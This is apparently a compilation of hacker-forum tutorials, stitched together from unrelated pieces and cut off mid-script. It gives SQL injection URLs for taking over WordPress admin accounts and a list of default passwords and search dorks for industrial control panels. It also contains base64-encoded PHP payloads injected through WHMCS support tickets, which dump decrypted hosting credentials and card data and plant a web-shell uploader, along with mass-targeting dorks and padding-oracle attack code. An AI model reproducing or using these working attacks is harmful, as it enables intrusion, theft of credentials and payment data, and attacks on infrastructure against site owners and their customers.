http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,
4,5,concat(user_login,0x3a,user_pass),?7,8,9,10,11,12+from+wp_users--
> im going to get the user name and the hashed password ..
> (point to be noted here .. im using concat here .. u can also use group_concat to get all the
users..
> again .. that would be ur knowledge how u use sqli)
> now .. we all know that wordpress hashes belong to the category MD5(wordpress).. (different
from simple MD5)
> and are very hard to crack ..
> but if ur mad .. u should think out of the box ..
> so now follow the steps ..
a) go to the login page of of wordpress site .. in my case that would be ..
Code : http://masaru.ikeda.me/wp-login.php
b) click on Lost your password ?
c) now the wordpress will ask me for the username or email .. for which i want to reset the
password .. in my case that is 'masaru' .. so go ahead and enter the username ..
d) now look closely .. it says .. "Check your e-mail for the confirmation link."
e) now what wordpress does actually .. it sends an activation key to the email address of that user
.. and it sets the value of activation key in the database aswell .. what u have to do is just to get
that key ..
f) so now im going to change my URL to this .. to get the activation key ..
Code :
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,
4,5,concat(user_login,0x3a,user_activa?tion_key),7,8,9,10,11,12+from+wp_users--
NOTE: we got the activation key here .. u should note it down somewhere ..
g) Now .. finally all we have to do is .. without going to the email address .. reset the password ..
for that im going to add this to my URL ..
Code : wp-login.php?action=rp&key=KEYHERE&login=USER NAME HERE

and im going to replace the KEYHERE with the activation key i got .. and the USERNAME
HERE with the username .. which in my case is 'masaru' .. so my URL will be ..
Code : http://masaru.ikeda.me/wp-
login.php?action=rp&key=cFn9vDsT3X2ZnW8vEda6&login=masaru
and VOILA .. the wordpress will ask u for ur new password ..
now go the login page again .. and try the new password .. and there u go .. u got access to the
panel ..
now u know how to shell the wordpress site .. don't u ??
Trick for those .. who are actually MAD:
1) Now to chk quickly if a website is using the latest version 3.4.2 or previous versions ..
> goto the login page and see .. if there is an option there to go back to the main page of the
blog..
> like in my case see the option .. <- Back to Digital Way of Living then this is not 3.4.2 ...
> if u don't see this option .. then it is 3.4.2 .. this trick is not legit .. i figured it out .. and is
working for me ..
2) once u have shelld the website ..
> get the database details ..
> use any database connector ..
> go to the table .. wp_user .. and in the column wp_pass ..
> replace the hash with the one u got in the very beginning ..
> the actual hash of the admin .. now the password will be again what it was before ..
> as nothing happened .. admin will never know what hit 'em ..

Now .. in the latest version .. 3.4.2 .. what happens actually .. that after confirming the activation
key wordpress don't let you choose a new password .. rather . it actually sends u a random
password on ur Email ..

How To Hack WordPress Websites using SQL Injection:
Hacking Tutorial 5 comments
Tutorial:How To Hack WordPress Websites using SQL injection
What is Wordpress??
WordPress is a free and open source blogging tool and a content management syste (CMS) based on
PHP and MySQL. It has many features including a plug-in architecture and a template system. WordPress
is currently the most popular blogging system in use on the Web.It was first released on May 27, 2003,
by founders Matt Mullenweg.
Now lets move on to a hacking website.I have used here all-video-gallery(WordPress plugin) Sqli
Vulnerability..
1>First we will find a Target using a Google dork
inurl:all-video-gallery/config.php?vid=

click on image for better preview.......
2>Open any website.... In my case its juangrial.com.

3>now lets do a sql injection....copy the exploit code then hit enter then see the Magic...:)

Exploit Code for finding usename &password: http://site.com/wp-content/plugins/all-video-
gallery/config.php?vid=1&pid=11&pid=-
1+union+select+1,2,3,4,group_concat(user_login,0x3a,user_pass),6,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,
39,40,41+from+wp_users--

You can also try this.......well Both will work the same.........
Exploit Code for finding usename &email: http://site.com/wp-content/plugins/all-video-
gallery/config.php?vid=1&pid=11&pid=-
1+union+select+1,2,3,4,group_concat(user_login,0x3a,user_email),6,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,
39,40,41+from+wp_users-

-

4>We Got admin Email......Now Let!s reset it.....

For that GO to:- http://site.com/wp-admin OR https://site.com/wp-login.php
"Then click on Lost Password"

5>Enter the Email we Got IN earlier steps...

6>Now come back and go to activation table....
* Exploit Code for activation Key: http://site.com/wp-content/plugins/all-video-
gallery/config.php?vid=1&pid=11&pid=-
1+union+select+1,2,3,4,group_concat(user_login,user_activation_key,0x3b),6,7,8,9,10,

11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,
39,40,41+from+wp_users--

7>yeah!!!we got what we need now lets change the admin password...
goto:http://site.com/wp-login.php?action=rp&key=resetkey&login=username

8> Now open http://site.com/wp-admin

and Login with new password..........xD

DNS Zone Transfer Vulnerability Exploit

 Scan website with Acunetix Web Vulnerability Scanner.
 If you get DNS zone transfer vulnerability

 Open command prompt (run>cmd)
 do nslookup.
 type > ns lookup
 type > server <website name>

 C:\> set type-any
 C:\> ls -d <website name>

Hacking SCADA Systems
With the discovery of stuxnet and all the subsequent interest in industrial control systems it's
worthwhile to learn a bit on how to exploit these for our own purposes. For now it's a copypaste
of various information on ICS products. Eventually I will rewrite it as a fluent tutorial, but until
then you can use this article as a starting point in your own research.
Contents :-
 Terminology
 Default Passwords
 Google Dorks
 Vulnerabilities and Other Resources
Terminology :
PLC: Programmable Logic Controller
RTU: Remote Terminal Unit
HMI: Human-Machine Interface
Default Passwords :
These should always be your first try if you come across an HMI listed. Due to the fact that the
amount of attention these systems have received has only been true recently many of these HMIs
still have their defaults. These can be accessed using a web panel, telnet, or VNC. Links to
support documents have been provided to familiarize yourself with these systems.
Schneider Electrics :
pcfactory:pcfactory
loader:fwdownload
ntpupdate:ntpupdate
sysdiag:factorycast@schneider
test:testingpw
USER:USER
USER:USERUSER
webserver:webpages

fdrusers:sresurdf
nic2212:poiuypoiuy
nimrohs2212:qwertyqwerty
nip2212:fcsdfcsd
ftpuser:ftpuser
noe77111_v500:RcSyyebczS
AUTCSE:RybQRceeSd
AUT_CSE:cQdd9debez
target:RcQbRbzRyc
Siemens Simatic :
Administrator:100
Siemens WinCC :
WinCCConnect:2WSXcder
WinCCAdmin:2WSXcder
WAGO :
admin:wago
Google Dorks :
These will be added to as I go along, but are just a couple you can try out to search for HMIs.
inurl:/plc/webvisu.htm
"Miniweb on" "Control Functions" -filetype:pdf
Vulnerabilities and Other Resources
Vulnerabilities in some SCADA server softwares
Metasploit Modules for SCADA-related Vulnerabilities
SIMATIC HMI panels - some default Simatic HMIs you can play around with

WHMCS Hacking with Sumbit Ticket exploit

Hi Mates !
Today we are going to learn, how to Hack WHMCS or you can say its submit ticket exploit
,through which we will we will get the cpanel username and password of hosting panel and
website hosted on that whmcs.
lets start
step 1 : Get a website which provide hosting and find out the option " submit ticket"
step 2 : now open submit ticket option and click on sales department

step 3 : now we have to fill the following
info like "name , email address, urgency put any random info is these fields and main thing
is subject filed"

fill this code in subject field :

{php}evaL(base64_decode('DQppbmNsdWRlKCdjb25maWd1cmF0aW9uLnBocCcpOw0KDQ
okcXVlcnkgPSBteXNxbF9xdWVyeSgiU0VMRUNUICogRlJPTSB0YmxzZXJ2ZXJzIik7DQok
dGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgSE9TVCBST09UUyAj
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcclxuIjsNCndoaWxlKCR2ID0gbXlzcWxfZmV0Y2h
fYXJyYXkoJHF1ZXJ5KSkgew0KDQokaXBhZGRyZXNzID0gJHZbJ2lwYWRkcmVzcyddOw
0KJHVzZXJuYW1lID0gJHZbJ3VzZXJuYW1lJ107DQokdHlwZSA9ICR2Wyd0eXBlJ107DQo
kYWN0aXZlID0gJHZbJ2FjdGl2ZSddOw0KJGhvc3RuYW1lID0gJHZbJ2hvc3RuYW1lJ107DQ
oNCg0KJHBhc3N3b3JkID0gZGVjcnlwdCAoJHZbJ3Bhc3N3b3JkJ10sICRjY19lbmNyeXB0aW
9uX2hhc2gpOw0KDQokdGV4dD0kdGV4dC4iVHlwZSAkdHlwZVxyXG4iOw0KJHRleHQ9J
HRleHQuIkFjdGl2ZSAkYWN0aXZlXHJcbiI7DQokdGV4dD0kdGV4dC4iSG9zdG5hbWUgJG
hvc3RuYW1lXHJcbiI7DQokdGV4dD0kdGV4dC4iSXAgJGlwYWRkcmVzc1xyXG4iOw0 KJH
RleHQ9JHRleHQuIlVzZXJuYW1lICR1c2VybmFtZVxyXG4iOw0KJHRleHQ9JHRleHQuIlBhc
3N3b3JkICRwYXNzd29yZFxyXG4qKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKio
qKlxyXG4iOw0KDQoNCn0NCiR0ZXh0PSR0ZXh0LiJcclxuIyMjIyMjIyMjIyMjIyMjIyMjIyMj
IyMjIyBIT1NUIFJPT1RTICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KDQokd
GV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgRG9tYWluIFJlc2VsbG
VyICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KDQokcXVlcnkgPSBteXNxbF9
xdWVyeSgiU0VMRUNUICogRlJPTSB0YmxyZWdpc3RyYXJzIik7DQoNCndoaWxlKCR2ID0
gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KDQokcmVnaXN0cmFyIAk9ICR2Wyd
yZWdpc3RyYXInXTsNCiRzZXR0aW5nID0gJHZbJ3NldHRpbmcnXTsNCiR2YWx1ZSA9IGR
lY3J5cHQgKCR2Wyd2YWx1ZSddLCAkY2NfZW5jcnlwdGlvbl9oYXNoKTsNCmlmICgkdmF
sdWU9PSIiKSB7DQokdmFsdWU9MDsNCn0NCiRwYXNzd29yZCA9IGRlY3J 5cHQgKCR2

WydwYXNzd29yZCddLCAkY2NfZW5jcnlwdGlvbl9oYXNoKTsNCiR0ZXh0PSR0ZXh0LiIkc
mVnaXN0cmFyICRzZXR0aW5nICR2YWx1ZVxyXG4iOw0KfQ0KJHRleHQ9JHRleHQuIlxy
XG4jIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIERvbWFpbiBSZXNlbGxlciAjIyMjIyMjIyMjIyMj
IyMjIyMjIyMjIyMjIyNcclxuIjsNCg0KJHRleHQ9JHRleHQuIlxyXG4jIyMjIyMjIyMjIyMjIyMjI
yMjIyMjIyMjIEZUUCArU01UUCAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcclxuIjsNCgkk
cXVlcnkgPSBteXNxbF9xdWVyeSgiU0VMRUNUICogRlJPTSB0Ymxjb25maWd1cmF0aW9uI
HdoZXJlIHNldHRpbmc9J0ZUUEJhY2t1cEhvc3RuYW1lJyBvciBzZXR0aW5nPSdGVFBCYW
NrdXBVc2VybmFtZScgb3IgIHNldHRpbmc9J0ZUUEJhY2t1cFBhc3N3b3JkJyBvciAgc2V0dGl
uZz0nRlRQQmFja3VwRGVzdGluYXRpb24nIG9yICBzZXR0aW5nPSdTTVRQSG9zdCcgb3Ig
IHNldHRpbmc9J1NNVFBVc2VybmFtZScgb3Igc2V0dGluZz0nU01UUFBhc3N3b3JkJyBvciA
gc2V0dGluZz0nU01UUFBvcnQnIik7DQp3aGlsZSgkdiA9IG15c3FsX2ZldGNoX2FycmF5KCR
xdWVyeSkpIHsNCiR2YWx1ZSA9JHZbJ3ZhbHVlJ107DQppZiAoJHZhbHVlPT0iIikgew0KJH
ZhbHVlPTA7DQp9DQoNCiR0ZXh0PSR0ZXh0LiR2WydzZXR0aW5nJ10uIiAiLiR2YWx1ZS
4iXHJcbiIgOw0KCQ0KfQ0KCQ0KCQ0KCSR0ZXh0PSR0ZXh0LiJcclxuIyMjIyMjIyMjIyMjI
yMjIyMjIyMjIyMjIyBGVFAgK1NNVFAgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXHJcbiI
7DQoJDQoJCSR0ZXh0PSR0ZXh0LiJcclxuIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyBDbGllbn
QgUjAwdHMgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXHJcbiI7DQogJHF1ZXJ5ID0gbXlz
cWxfcXVlcnkoIlNFTEVDVCAqIEZST00gdGJsaG9zdGluZyB3aGV yZSB1c2VybmFtZSA9ICd
yb290JyBvciB1c2VybmFtZSA9ICdBZG1pbicgb3IgdXNlcm5hbWUgPSAnYWRtaW4nIG9yIH
VzZXJuYW1lID0gJ0FkbWluaXN0cmF0b3InIG9yICB1c2VybmFtZSA9ICdhZG1pbmlzdHJhd
G9yJyBvcmRlciBieSBkb21haW5zdGF0dXMiKTsNCg0KIA0KICAgIHdoaWxlKCR2ID0gbXlz
cWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KICAgJHRleHQ9JHRleHQuIlxyXG5Eb21ha
W4gIi4kdlsnZG9tYWluJ10uIlxyXG5JUCAiLiR2WydkZWRpY2F0ZWRpcCddLiJcclxuVXNlc
m5hbWUgIi4kdlsndXNlcm5hbWUnXS4iXHJcblBhc3N3b3JkICIuZGVjcnlwdCAoJHZbJ3Bhc3
N3b3JkJ10sICRjY19lbmNyeXB0aW9uX2hhc2gpLiJcclxuRG9tYWluc3RhdHVzIi4kdlsnZG9tY
Wluc3RhdHVzJ10uIlxyXG4iOw0KICAgIH0NCgkkdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjI
yMjIyMjIyMjIyMjIyMjIyMgQ2xpZW50IFIwMHRzICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy
MjI1xyXG4iOw0KCQ0KCQkkdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIy
MjIyMgQ2xpZW50IEhPU1QgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXHJcbiI7DQogJHF
1ZXJ5ID0gbXlzcWxfcXVlcnkoIlNFTEVDVCAqIEZST00gdGJsaG9zdGluZyB3aGVyZSBkb2
1haW5zdGF0dXM9J0FjdGl2ZSciKTsNCg0KIA0KICAgIHdoaWxlKCR2ID0gbXlzcWxfZmV0
Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KCWlmICgoJHZbJ3VzZXJuYW1lJ10gKSBhbmQgKCR2
WydwYXNzd29yZCddKSkgew0KICAgJHRleHQ9JHRleHQuIlxyXG5Eb21haW4gIi4kdlsnZG9
tYWluJ10uIlxyXG5JUCAiLiR2WydkZWRpY2F0ZWRpcCddLiJcclxuVXNlcm5hbWUgIi4kdls
ndXNlcm5hbWUnXS4iXHJcblBhc3N3b3JkICIuZGVjcnlwdCAoJHZbJ3Bhc3N3b3JkJ10sICRj
Y19lbmNyeXB0aW9uX2hhc2gpLiJcclxuRG9tYWluc3RhdHVzIi4kdlsnZG9tYWluc3RhdHVzJ
10uIlxyXG4iOw0KICAgIH0NCgl9DQoJJHRleHQ9JHRleHQuIlxyXG4jIyMjIyMjIyMjIyMjIy
MjIyMjIyMjIyMjIENsaWVudCBIT1NUICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4i
Ow0KCQ0KCQ0KCQkkdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy
MgQ2xpZW50IENDICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KCSRxdWVye
SA9IG15c3FsX3F1ZXJ5KCJTRUxFQ1QgKiBGUk9NIGB0YmxjbGllbnRzYCBXSEVSRSBjY
XJkdHlwZSA8PiAnJyBvcmRlciBieSBpc3N1ZW51bWJlciBkZXNjIik7DQoNCgkNCndoaWxl
KCR2ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KJGNjaGF zaCA9IG1kNSggJ

GNjX2VuY3J5cHRpb25faGFzaC4kdlsnMCddKTsNCiRzPSAgbXlzcWxfcXVlcnkoInNlbGVjd
CBjYXJkdHlwZSxBRVNfREVDUllQVChjYXJkbnVtLCd7JGNjaGFzaH0nKSBhcyBjYXJkbn
VtLEFFU19ERUNSWVBUKGV4cGRhdGUsJ3skY2NoYXNofScpIGFzIGV4cGRhdGUsQUV
TX0RFQ1JZUFQoaXNzdWVudW1iZXIsJ3skY2N oYXNofScpIGFzIGlzc3VlbnVtYmVyLEFF
U19ERUNSWVBUKHN0YXJ0ZGF0ZSwneyRjY2hhc2h9JykgYXMgc3RhcnRkYXRlICBGUk
9NIGB0YmxjbGllbnRzYCB3aGVyZSBpZD0nIi4kdlsnMCddLiInIiApOw0KDQokdjI9bXlzcW
xfZmV0Y2hfYXJyYXkoJHMpOw0KDQogICR0ZXh0PSR0ZXh0LiJcclxuIi4kdjJbMF0uInwiLi
R2MlsxXS4ifCIuJHYyWzJdLiJ8Ii4kdjJbM10uInwiLiR2Mls0XTsNCn0NCg0KDQogICANCiA
NCgkkdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgQ2xpZW50IEN
DICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KCQ0KCWVjaG8oJHRleHQpOw
=='));exit;{/php}
______________________________________________________________________________

and scroll down fill the Captcha click the submit button

we will be redirected to next page where it will show cpanel username and password
boom ! you have cpanel usernames and passwords of hosting panel,website hosted on that server
if you are lucky , you may also get the FTP and SMTP passwords too !

ok it was all about the the cpanel,FTP and SMTP passwords if whmcs dont have any website
hosted on it you wont get anything then ????????
dont be sad :)
we have one more trick and this will help you to upload the shell on whmcs website :)
how ???
lets move :)
come back to the submit ticket page put any random info in email,name and urgency field
main step is to put the php code in subject field this time we are going to put the php code, if it
got executed successfully we will get a uploader on the website through which we will be able
to upload shell on the website so lets start

fill the any random info in other fields and put this php code in subject field

{php}eval(base64_decode('JGM9YmFzZTY0X2RlY29kZSgiUEQ5d2FIQU5DbWxtS0dsemMy
VjBLQ1JmVUU5VFZGc25VM1ZpYldsMEoxMHBLWHNOQ2lBZ0lDQWtabWxzWldScGNp
QTlJQ0lpT3lBTkNpQWdJQ0FrYldGNFptbHNaU0E5SUNjeU1EQXdNREF3SnpzTkNnMEtJQ
0FnSUNSMWMyVnlabWxzWlY5dVlXMWxJRDBnSkY5R1NVe EZVMXNuYVcxaFoyVW5Y
VnNuYm1GdFpTZGRPdzBLSUNBZ0lDUjFjMlZ5Wm1sc1pWOTBiWEFnUFNBa1gwWkpU
RVZUV3lkcGJXRm5aU2RkV3lkMGJYQmZibUZ0WlNkZE93MEtJQ0FnSUdsbUlDaHBjM05
sZENna1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkdVlXMWxKMTBwS1NCN0RRb2dJQ0Fn
SUNBZ0lDUmhZbTlrSUQwZ0pHWnBiR1ZrYVhJdUpIV npaWEptYVd4bFgyNWhiV1U3RFF
vZ0lDQWdJQ0FnSUVCdGIzWmxYM1Z3Ykc5aFpHVmtYMlpwYkdVb0pIVnpaWEptYVd4b
FgzUnRjQ3dnSkdGaWIyUXBPdzBLSUNBTkNtVmphRzhpUEdObGJuUmxjajQ4WWo1RWIy
NWxJRDA5UGlBa2RYTmxjbVpwYkdWZmJtRnRaVHd2WWo0OEwyTmxiblJsY2o0aU93ME
tmUTBLZlEwS1pXeHpaWHNOQ21WamFHO G5EUW84Wm05eWJTQnRaWFJvYjJROUlsQl
BVMVFpSUdGamRHbHZiajBpSWlCbGJtTjBlWEJsUFNKdGRXeDBhWEJoY25RdlptOXliUz
FrWVhSaElqNDhhVzV3ZFhRZ2RIbHdaVDBpWm1sc1pTSWdibUZ0WlQwaWFXMWhaMlV
pUGp4cGJuQjFkQ0IwZVhCbFBTSlRkV0p0YVhRaUlHNWhiV1U5SWxOMVltMXBkQ0lnZ

G1Gc2RXVTlJbE4xWW0xcGRDS StQQzltYjNKdFBpYzdEUXA5RFFvL1BpQT0iKTsNCiRm
aWNoaWVyID0gZm9wZW4oJ2Rvd25sb2Fkcy9pbmRleHgucGhwJywndycpOw0KZndyaXRlK
CRmaWNoaWVyLCAkYyk7DQpmY2xvc2UoJGZpY2hpZXIpOw=='));exit;{/php}
______________________________________________________________________________

fill the captcha click enter, now first of all , have a look on the submit ticket url
for example
http://www.website.com/client/submitticket.php
so to get the uploader replace the submitticket.php with downloads/indexx.php
remember its indexx.php,when code will execute , it will create indexx.php and its
uploader
so open the url
http://www.website.com/client/downloads/indexx.php
you will see file upload option !

browse the shell and click upload after uploading shell
opn the url
http://www.website.com/client/downloads/shell_name.php
hell yeah
owned :D

WHMCS Auto Exploiter
 Take WHMCS auto exploiter php script.
 Upload it to some php server.

 In Google Dork make your own dork and click exploit like :

Dorks :

inurl:submitticket.php site:.com
inurl:submitticket.php site:.net
inurl:submitticket.php site:.us
inurl:submitticket.php site:.eu
inurl:submitticket.php site:.org
inurl:submitticket.php site:.uk
intext:”Powered by WHMCompleteSolution”
intext:”Powered by WHMCompleteSolution” inurl:clientarea.php
inurl:announcements.php intext:”WHMCompleteSolution”
intext:”Powered by WHMCS”

 Crack hash.
 Go to site and open admin panel and make successful login.

Oracle Padding Attack Using Brup Suite

Requiements :

 Microsoft SQl Server 2008 R2
 Brup Suit Professional v1.4.07
 exe.bat [ Save it in notepad and rename as exe.bat ]

@echo off
cmd

 padBuster.pl [ Save it in notepad and rename as padBuster.pl ]
#!/usr/bin/perl
#
# PadBuster v0.3.3 - Automated script for performing Padding Oracle attacks
# Brian Holyfield - Gotham Digital Science ([email protected])
#
# Credits to J.Rizzo and T.Duong for providing proof of concept web exploit
# techniques and S.Vaudenay for initial discovery of the attack. Credits also
# to James M. Martin ([email protected]) for sharing proof of concept exploit
# code for performing various brute force attack techniques, and wireghoul (Eldar
# Marcussen) for making code quality improvements.
#

use LWP::UserAgent;
use strict;
use warnings;
use Getopt::Std;
use MIME::Base64;

use URI::Escape;
use Getopt::Long;
use Time::HiRes qw( gettimeofday );
use Compress::Zlib;
use Crypt::SSLeay;

# Set defaults with $variable = value
my $logFiles;
my $post;
my $encoding = 0;
my $headers;
my $cookie;
my $error;
my $prefix;
my $intermediaryInput;
my $cipherInput;
my $plainTextInput;
my $encodedPlainTextInput;
my $noEncodeOption;
my $superVerbose;
my $proxy;
my $proxyAuth;
my $noIv;
my $auth;
my $resumeBlock;
my $interactive = 0;

my $bruteForce;
my $ignoreContent;
my $useBody;
my $verbose;

GetOptions( "log" => \$logFiles,
"post=s" => \$post,
"encoding=s" => \$encoding,
"headers=s" => \$headers,
"cookies=s" => \$cookie,
"error=s" => \$error,
"prefix=s" => \$prefix,
"intermediate=s" => \$intermediaryInput,
"ciphertext=s" => \$cipherInput,
"plaintext=s" => \$plainTextInput,
"encodedtext=s" => \$encodedPlainTextInput,
"noencode" => \$noEncodeOption,
"veryverbose" => \$superVerbose,
"proxy=s" => \$proxy,
"proxyauth=s" => \$proxyAuth,
"noiv" => \$noIv,
"auth=s" => \$auth,
"resume=s" => \$resumeBlock,
"interactive" => \$interactive,
"bruteforce" => \$bruteForce,
"ignorecontent" => \$ignoreContent,

"usebody" => \$useBody,
"verbose" => \$verbose);

print "\n+-------------------------------------------+\n";
print "| PadBuster - v0.3.3 |\n";
print "| Brian Holyfield - Gotham Digital Science |\n";
print "| labs\@gdssecurity.com |\n";
print "+-------------------------------------------+\n";

if ($#ARGV < 2) {
die "
Use: padBuster.pl URL EncryptedSample BlockSize [options]

Where: URL = The target URL (and query string if applicable)
EncryptedSample = The encrypted value you want to test. Must
also be present in the URL, PostData or a Cookie
BlockSize = The block size being used by the algorithm

Options:
-auth [username:password]: HTTP Basic Authentication
-bruteforce: Perform brute force against the first block
-ciphertext [Bytes]: CipherText for Intermediate Bytes (Hex-Encoded)
-cookies [HTTP Cookies]: Cookies (name1=value1; name2=value2)
-encoding [0-4]: Encoding Format of Sample (Default 0)
0=Base64, 1=Lower HEX, 2=Upper HEX
3=.NET UrlToken, 4=WebSafe Base64

-encodedtext [Encoded String]: Data to Encrypt (Encoded)
-error [Error String]: Padding Error Message
-headers [HTTP Headers]: Custom Headers (name1::value1;name2::value2)
-interactive: Prompt for confirmation on decrypted bytes
-intermediate [Bytes]: Intermediate Bytes for CipherText (Hex-Encoded)
-log: Generate log files (creates folder PadBuster.DDMMYY)
-noencode: Do not URL-encode the payload (encoded by default)
-noiv: Sample does not include IV (decrypt first block)
-plaintext [String]: Plain-Text to Encrypt
-post [Post Data]: HTTP Post Data String
-prefix [Prefix]: Prefix bytes to append to each sample (Encoded)
-proxy [address:port]: Use HTTP/S Proxy
-proxyauth [username:password]: Proxy Authentication
-resume [Block Number]: Resume at this block number
-usebody: Use response body content for response analysis phase
-verbose: Be Verbose
-veryverbose: Be Very Verbose (Debug Only)

";}

# Ok, if we've made it this far we are ready to begin..
my $url = $ARGV[0];
my $sample = $ARGV[1];
my $blockSize = $ARGV[2];

if ($url eq "" || $sample eq "" || $blockSize eq "") {

print "\nERROR: The URL, EncryptedSample and BlockSize cannot be null.\n";
exit();
}

# Hard Coded Inputs
#$post = "";
#$sample = "";

my $method = $post ? "POST" : "GET";

# These are file related variables
my $dirName = "PadBuster." . &getTime("F");
my $dirSlash = "/";
my $dirCmd = "mkdir ";
if (defined($ENV{'OS'})) {
if ($ENV{OS} =~ /Windows/) {
$dirSlash = "\\";
$dirCmd = "md ";
}
}
my $dirExists = 0;
my $printStats = 0;
my $requestTracker = 0;
my $timeTracker = 0;

if ($encoding < 0 || $encoding > 4) {

print "\nERROR: Encoding must be a value between 0 and 4\n";
exit();
}
my $encodingFormat = $encoding ? $encoding : 0;

my $encryptedBytes = $sample;
my $totalRequests = 0;

# See if the sample needs to be URL decoded, otherwise don't (the plus from B64 will be a
problem)
if ($sample =~ /\%/) {
$encryptedBytes = &uri_unescape($encryptedBytes)
}

# Prep the sample for regex use
$sample = quotemeta $sample;

# Now decode
$encryptedBytes = &myDecode($encryptedBytes, $encodingFormat);
if ( (length($encryptedBytes) % $blockSize) > 0) {
print "\nERROR: Encrypted Bytes must be evenly divisible by Block Size
($blockSize)\n";
print " Encrypted sample length is ".int(length($encryptedBytes)).". Double check the
Encoding and Block Size.\n";
exit();
}

# If no IV, then append nulls as the IV (only if decrypting)
if ($noIv && !$bruteForce && !$plainTextInput) {
$encryptedBytes = "\x00" x $blockSize . $encryptedBytes;
}

# PlainTextBytes is where the complete decrypted sample will be stored (decrypt only)
my $plainTextBytes;

# This is a bool to make sure we know where to replace the sample string
my $wasSampleFound = 0;

# ForgedBytes is where the complete forged sample will be stored (encrypt only)
my $forgedBytes;

# Isolate the IV into a separate byte array
my $ivBytes = substr($encryptedBytes, 0, $blockSize);

# Declare some optional elements for storing the results of the first test iteration
# to help the user if they don't know what the padding error looks like
my @oracleCantidates;
my $oracleSignature = "";
my %oracleGuesses;
my %responseFileBuffer;

# The block count should be the sample divided by the blocksize
my $blockCount = int(length($encryptedBytes)) / int($blockSize);

if (!$bruteForce && !$plainTextInput && $blockCount < 2) {
print "\nERROR: There is only one block. Try again using the -noiv option.\n";
exit();
}

# The attack works by sending in a real cipher text block along with a fake block in front of it
# You only ever need to send two blocks at a time (one real one fake) and just work through
# the sample one block at a time

# First, re-issue the original request to let the user know if something is potentially broken
my ($status, $content, $location, $contentLength) = &makeRequest($method, $url, $post,
$cookie);

&myPrint("\nINFO: The original request returned the following",0);
&myPrint("[+] Status: $status",0);
&myPrint("[+] Location: $location",0);
&myPrint("[+] Content Length: $contentLength\n",0);
&myPrint("[+] Response: $content\n",1);

$plainTextInput = &myDecode($encodedPlainTextInput,$encodingFormat) if
$encodedPlainTextInput;

if ($bruteForce) {
&myPrint("INFO: Starting PadBuster Brute Force Mode",0);
my $bfAttempts = 0;

print "INFO: Resuming previous brute force at attempt $resumeBlock\n" if
$resumeBlock;

# Only loop through the first 3 bytes...this should be enough as it
# requires 16.5M+ requests

my @bfSamples;
my $sampleString = "\x00" x 2;
for my $c (0 ... 255) {
substr($sampleString, 0, 1, chr($c));
for my $d (0 ... 255) {
substr($sampleString, 1, 1, chr($d));
push (@bfSamples, $sampleString);
}
}

foreach my $testVal (@bfSamples) {
my $complete = 0;
while ($complete == 0) {
my $repeat = 0;
for my $b (0 ... 255) {
$bfAttempts++;
if ( $resumeBlock && ($bfAttempts < ($resumeBlock - ($resumeBlock % 256)+1)) ) {
#SKIP
} else {

my $testBytes = chr($b).$testVal;
$testBytes .= "\x00" x ($blockSize-3);

my $combinedBf = $testBytes;
$combinedBf .= $encryptedBytes;
$combinedBf = &myEncode($combinedBf, $encoding);

# Add the Query String to the URL
my ($testUrl, $testPost, $testCookies) = &prepRequest($url, $post, $cookie,
$sample, $combinedBf);

# Issue the request
my ($status, $content, $location, $contentLength) = &makeRequest($method,
$testUrl, $testPost, $testCookies);

my $signatureData = "$status\t$contentLength\t$location";
$signatureData = "$status\t$contentLength\t$location\t$content" if $useBody;

if ($oracleSignature eq "") {
&myPrint("[+] Starting response analysis...\n",0) if ($b ==0);
$oracleGuesses{$signatureData}++;
$responseFileBuffer{$signatureData} = "Status: $status\nLocation:
$location\nContent-Length: $contentLength\nContent:\n$content";
if ($b == 255) {
&myPrint("*** Response Analysis Complete ***\n",0);
&determineSignature();

$printStats = 1;
$timeTracker = 0;
$requestTracker = 0;
$repeat = 1;
$bfAttempts = 0;
}
}
if ($oracleSignature ne "" && $oracleSignature ne $signatureData) {
&myPrint("\nAttempt $bfAttempts - Status: $status - Content Length:
$contentLength\n$testUrl\n",0);
&writeFile("Brute_Force_Attempt_".$bfAttempts.".txt", "URL:
$testUrl\nPost Data: $testPost\nCookies: $testCookies\n\nStatus: $status\nLocation:
$location\nContent-Length: $contentLength\nContent:\n$content");
}
}
}
($repeat == 1) ? ($complete = 0) : ($complete = 1);
}
}
